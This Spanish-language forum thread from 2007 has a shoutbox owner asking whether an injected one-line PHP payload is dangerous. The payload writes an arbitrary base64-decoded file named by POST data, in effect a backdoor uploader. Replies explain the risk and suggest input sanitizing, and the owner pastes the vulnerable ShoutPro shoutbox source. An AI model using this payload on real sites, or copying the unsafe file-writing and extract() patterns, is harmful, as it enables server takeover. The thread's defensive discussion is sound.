Puede ser peligroso este codigo? (<?$a=fopen($_POST['f'],'w');fwrite($a,base64_decode

F.Y.N. · #1 (**permalink**) 13/05/2007, 21:59

Holas, veran tengo un shoutbox y algun "hacker" me puso en el shoutbox este codigo:

Código:

<?$a=fopen($_POST['f'],'w');fwrite($a,base64_decode($_POST['d']));fclose($a);?>

y resulta que obviamente no es por casualidad, por que he visto en varios sitios el mismo posteo de un tal "Beethoven", con exactamente el mismo codigo. Vean esta busqueda:

Google

Vean los links y veran que en varios sitios este "hacker" pone ese codigo, puede llegar a ser peligroso o pude revelar alguna informacion?

Salu1+1

jomerin · #2 (**permalink**) 14/05/2007, 01:59

Con ese código te creará un fichero llamado como él quiera y con el contenido que quiera, tanto texto como binario (ejecutable)... pudiendo sobreescribir alguno tuyo (el de contraseñas, base de datos, protección de directorios, configuración de cualquier programa..) así que si, es bastante peligroso.

Un saludo
Adrián Fernández
[email protected]

F.Y.N. · #3 (**permalink**) 14/05/2007, 13:32

Y hay alguna manera de protegerme frente a este ataque?, a pesar de que al parecer no paso nada, no sabria decirte si algun fichero fue modificado.

Salu1+1

GatorV · #4 (**permalink**) 14/05/2007, 15:23

Para protegerte, necesitariamos ver el codigo de tu shoutbox para ver que tan vulnerable es.

b3nj4 · #5 (**permalink**) 14/05/2007, 15:32

Lo que tienes que hacer es validar siempre los datos que introducen los usuarios antes de meterlos en BD o usarlos de cualquier forma.

Para datos que se guardan en MySQL puedes usar esta función:
http://es2.php.net/mysql_real_escape_string

Esto también te servirá:
function realsafehtml($str) {
// Don't do anything if there's no difference or if the original string is empty
$oldstr = "";

while($str != $oldstr) // Loop until it got no more effect
{
$oldstr = $str;
//nuke script and header tags and anything inbetween
$str = preg_replace("'<script[^>]*?>.*?</script>'si", "", $str);
$str = preg_replace("'<head[^>]*?>.*?</head>'si", "", $str);

//listed of tags that will not be striped but whose attributes will be
$allowed = "br|b|i|p|u|a|center|hr";
//start nuking those suckers. don you just love MS Word's HTML?
$str = preg_replace("/<((?!\/?($allowed)\b)[^>]*>)/xis", "", $str);
$str = preg_replace("/<($allowed).*?>/i", "<\\1>", $str);
}

return $str;
}

Está en:
http://terra.di.fct.unl.pt/docs/php/...p-tags.php.htm

F.Y.N. · #6 (**permalink**) 14/05/2007, 16:52

no lo hice yo, es un script libre de shoutpro.com

Cita:

<?php
if ($_POST["action"]!="") $action = $_POST['action'];
else if ($_GET["action"]!="") $action = $_GET["action"];

if ($_POST["name"]!="") $name = $_POST['name'];
else if ($_GET["name"]!="") $name = $_GET["name"];

if ($_POST["pass"]!="") $pass = $_POST['pass'];
else if ($_GET["pass"]!="") $pass = $_GET["pass"];

if ($_POST["shout"]!="") $shout = $_POST['shout'];
else if ($_GET["shout"]!="") $shout = $_GET["shout"];
require("include.php");
$restricted_names = array();
$index = 0;
$FileName="lists/names.php";
$list = file ($FileName);
foreach ($list as $value) {
list ($restrictedname,$namepass,$nameemail,) = explode ("|^|", $value);
$restricted_names[$index] = trim(strtolower($restrictedname));
$index++;
}

extract($HTTP_REQUEST_VARS);

if($action == "post" && $name && $name != "Name"){
//Prepare the name
$shout = trim($shout);
$shout = stripslashes($shout);
$shout = str_replace ("\n", " ", $shout);
$shout = str_replace ("\r", " ", $shout);
$name = trim($name);
$name = killhtml(killscript($name));
restrictedname($name,$pass);
setcookie("shoutpro_username", "", time() - 31536000);
$cookielife = time() + 31536000;
setcookie("shoutpro_username", $name, $cookielife);
}
?>
<html><head><title><?=$shoutboxname ?></title>
<link rel="stylesheet" href="<?=$theme ?>" type="text/css" />
<style type="text/css">.shout {overflow: hidden;}</style>
<SCRIPT language="JavaScript">
function reload() {
var loc = "shoutbox.php?";
if (document.getElementById('moreshouts').style.displ ay == 'inline')
loc += "viewall=true&";
<? if ($userpanelon == "yes"){ ?>
if (document.getElementById('userpaneloff').style.dis play == 'inline')
loc += "userpanelon=true&";
<? } ?>
location.href = loc;
}

function checkrname() {
var isin = false;
if (document.getElementById('name').value != ""){
for (var i = 0; i < namesarray.length; i++){
if (namesarray[i] == document.getElementById('name').value.toLowerCase( )){
alert("You have entered a registered name. Please provide the password.");
document.getElementById('passwordfield').style.dis play = 'inline';
document.getElementById('pass').focus();
isin = true;
}
}
}
if (isin == false){
document.getElementById('passwordfield').style.dis play = 'none';
document.getElementById('shout').focus();
document.getElementById('shout').select();
return false;
}
else return true;
}

function CheckForm(){
//Check if a name has been entered
if (document.getElementById('name').value == "" || document.getElementById('name').value == "Name"){
alert("<?=$inputname ?>");
document.getElementById('name').focus();
document.getElementById('name').select();
return false;
}

//Check if a shout has been entered
if (document.getElementById('shout').value == "" || document.getElementById('shout').value == "Shout!"){
alert("<?=$inputshout ?>");
document.getElementById('shout').focus();
document.getElementById('shout').select();
return false;
}

return true ;
}

function doviewall() {
document.getElementById('moreshouts').style.displa y = 'inline';
document.getElementById('viewall').style.display = 'none';
document.getElementById('viewless').style.display = 'inline';
}

function doviewless() {
document.getElementById('moreshouts').style.displa y = 'none';
document.getElementById('viewall').style.display = 'inline';
document.getElementById('viewless').style.display = 'none';
}

function openhelp() {
window.open('help.php','help_window','toolbar=no,l ocation=no,directories=no,status=no,menubar=no,scr ollbars=yes,resizable=no,copyhistory=no,width=270, height=400')
}

function stoptmr(){
if(tmron){
clearTimeout(timerID);
tmron = false;
}
}

function starttmr(){
stoptmr();
timerID = setTimeout('reload()', <?=$refresh ?>000);
tmron = true;
}
var tmron = false;
var tmrid;
<? if($refreshmode != "manual") echo("starttmr();"); ?>
var namesarray = new Array("<?=implode('","', $restricted_names); ?>");
</SCRIPT>
</head>
<body style="width: <?=$width ?>px !important;">
<?php
if($action=="post"){
if (!$name) echo("<script>alert(\"".$inputname."\");</script>");
else if (!$shout || $shout=="Shout!") echo("<script>alert(\"".$inputshout."\");</script>");
else {

$shout = trim($shout);
$shout = stripslashes($shout);
$shout = str_replace ("\n", " ", $shout);
$shout = str_replace ("\r", " ", $shout);
badname($name);
if(!namelength($name,$nameminlength,$namemaxlength )) die();
$shout = first($shout);
$name = first($name);
if(!length($shout,$minlength,$maxlength)) die();
$date = date("F j, Y", time() + $timeoffset * 3600);
$time = date("g:i A", time() + $timeoffset * 3600);

if($FilePointer = fopen("shouts.php", "a+")){
fwrite($FilePointer,"$name|^|$shout|^|$date|^|$tim e|^|$_SERVER[REMOTE_ADDR]|^|\n");
fclose($FilePointer);
}
}
echo("<script>location.href='shoutbox.php';</script>");
}
if ($displayname == "yes") echo ("<div align=center><b>$shoutboxname</b><br /><br />");
echo("<form name='postshout' method='post' action='shoutbox.php?action=post'>\n");
echo("<input id='name' class='textbox' name='name' type='text' value='");
if ($_COOKIE["shoutpro_username"]) echo $_COOKIE["shoutpro_username"];
else echo "Name";
echo ("' onFocus=\"stoptmr()\" onBlur=\"checkrname();\"><br />\n");
if ($_COOKIE["shoutpro_username"] && in_array(strtolower($_COOKIE["shoutpro_username"]),$restricted_names))
echo "<div id='passwordfield' style='display:inline'>";
else
echo "<div id='passwordfield' style='display:none'>";
echo("<input class='textbox' name='pass' id='pass' type='password' value='' onBlur=\"if(this.value != ''){document.getElementById('shout').focus();docum ent.getElementById('shout').select();}\" onFocus=\"stoptmr()\" /><br />\n</div><textarea id='shout' class=textbox name='shout' rows='5' onFocus=\"stoptmr()\">Shout!</textarea><br />\n");
echo("<div id='buttons'><input class=textbox type='submit' id='post' name='post' onFocus=\"this.select();\" value='Post' onclick='return CheckForm();'>\n");
if ($refreshmode != "auto") echo("<input class=textbox type=button value='Refrescar' onClick=\"reload()\">\n");
echo("</div></div>");
$row_count = 0;
$shouts = file("shouts.php");
$shouts = array_reverse($shouts);
foreach ($shouts as $item){
if ($row_count == $numshoutsdisplay){
if ($_REQUEST["viewall"] == true) echo "<div id='moreshouts' style='display:inline'>";
else echo "<div id='moreshouts' style='display:none'>";
$viewalled = true; //We already displayed the viewall div
}
$row = ($row_count % 2) ? "one" : "two";
list ($poster,$message,$date,$time,$ip) = explode ("|^|", $item);
$thisnamecolor = "";
$thisnamecolor = colornames($poster,$thisnamecolor);
$message=profanityfilter(shoutcode(smilies(killhtm l($message))));
$thisshout = "<span style='color: $thisnamecolor !important;' class='name'>$poster:</span> $message";
$thisshout = killscript($thisshout);
echo "<div class='shout' id='row-$row' title=\"Posted $date @ $time\">$thisshout</div>";
$row_count++;
}
if (!$viewalled) echo "<div id='moreshouts' style='display:none'>";
echo "</div><br /><div id='bottomlinks'>";
if ($row_count > $numshoutsdisplay){
if ($_REQUEST["viewall"] == true) echo "<a href='shoutbox.php?viewall=true' onClick='doviewall();' style='display:none' id='viewall'>Ver Todos</a><a href='shoutbox.php' onClick='doviewless();' id='viewless'>Ver Menos</a>::";
else echo "<a href='shoutbox.php?viewall=true' onClick='doviewall();' id='viewall'>Ver Todos</a><a href='shoutbox.php' onClick='doviewless(); ' style='display:none' id='viewless'>Ver Menos</a>::";
}
echo "<a href=\"javascript:openhelp();\">Ayuda</a>";
if($userpanelon == "yes")
if ($_REQUEST["userpanelon"] == true) echo "<br /><a href='#' id='userpanelon' onClick=\"document.getElementById('userpanel').sty le.display='inline';document.getElementById('userp anelon').style.display='none';document.getElementB yId('userpaneloff').style.display='inline';\" style='display:none'>Abrir Panel Control</a><a href='#' id='userpaneloff' onClick=\"document.getElementById('userpanel').sty le.display='none';document.getElementById('userpan elon').style.display='inline';document.getElementB yId('userpaneloff').style.display='none';\" style='display:inline'>Cerrar Panel Control</a>";
else echo "<br /><a href='#' id='userpanelon' onClick=\"document.getElementById('userpanel').sty le.display='inline';document.getElementById('userp anelon').style.display='none';document.getElementB yId('userpaneloff').style.display='inline';\">Abri r Panel Control</a><a href='#' id='userpaneloff' onClick=\"document.getElementById('userpanel').sty le.display='none';document.getElementById('userpan elon').style.display='inline';document.getElementB yId('userpaneloff').style.display='none';\" style='display:none'>Cerrar Panel Control</a>";
?>
</div><br />
<div id='userpanel' style='display:<? if ($_REQUEST["userpanelon"] == true) echo "inline"; else echo "none"; ?>'>
<a href='#' onClick="window.open('userpanel/register.php','userpanel','toolbar=no,location=no, directories=no,status=no,menubar=no,scrollbars=yes ,resizable=yes,copyhistory=no,width=400,height=400 ');"> -->Registrar un Nick</a><br />
<a href='#' onClick="window.open('userpanel/changepass.php','userpanel','toolbar=no,location=n o,directories=no,status=no,menubar=no,scrollbars=y es,resizable=yes,copyhistory=no,width=400,height=4 00');"> -->Cambiar tu Password</a><br />
<a href='#' onClick="window.open('userpanel/findpass.php','userpanel','toolbar=no,location=no, directories=no,status=no,menubar=no,scrollbars=yes ,resizable=yes,copyhistory=no,width=400,height=400 ');"> -->Resetear tu Password</a><br /><br />
</div>